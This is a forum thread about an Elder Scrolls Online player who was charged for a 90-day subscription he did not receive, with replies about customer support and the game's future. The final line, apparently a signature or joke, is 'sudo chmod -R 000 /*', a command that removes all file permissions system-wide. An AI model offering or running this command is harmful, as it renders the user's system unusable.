Elder Scrolls Online payment problems

Zohan2000

so, after finally getting my PC working again and being able to play games, i went to go play ESO but my subscription had ran out, so i went and bought a 90 day subscription for $42 AUD and they took out the money from my bank account but did not give me the 90 day subscription i had paid for, anyone else having these issues? and if so what can we do to get a refund for these issues?

Did you contact their customer support?

Yer and they said blame the bank pretty much then I threaten them and they said they'll take it to a higher level of support

Just wait 6 months and you won't have to pay at all. ;)

How so?

How so?

In my opinion the game will end up going free to play like a lot of other MMOs, I was not being wholly serious you should definitely persue them over this issue.

In my opinion the game will end up going free to play like a lot of other MMOs, I was not being wholly serious you should definitely persue them over this issue.

Yer haha still waiting on a reply from the "higher level of support" team and going f2p after a lot of people bought the game would make a lot of people unhappy, unless they take a swtor route then maybe it might work out but still there will be a lot of unhappy people

Yer haha still waiting on a reply from the "higher level of support" team and going f2p after a lot of people bought the game would make a lot of people unhappy, unless they take a swtor route then maybe it might work out but still there will be a lot of unhappy people

I normally gun for beta access to upcoming MMOs to test the waters, they never seem to differ much in the final version from beta as the betas are very late in development, I haven't played ESO at all, I watched some Twitch streams and decided that it wasn't for me.

so, after finally getting my PC working again and being able to play games, i went to go play ESO but my subscription had ran out, so i went and bought a 90 day subscription for $42 AUD and they took out the money from my bank account but did not give me the 90 day subscription i had paid for, anyone else having these issues? and if so what can we do to get a refund for these issues?

I would call them again and insist until you get the money back, then never touch the game again. they don't deserve a userbase.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*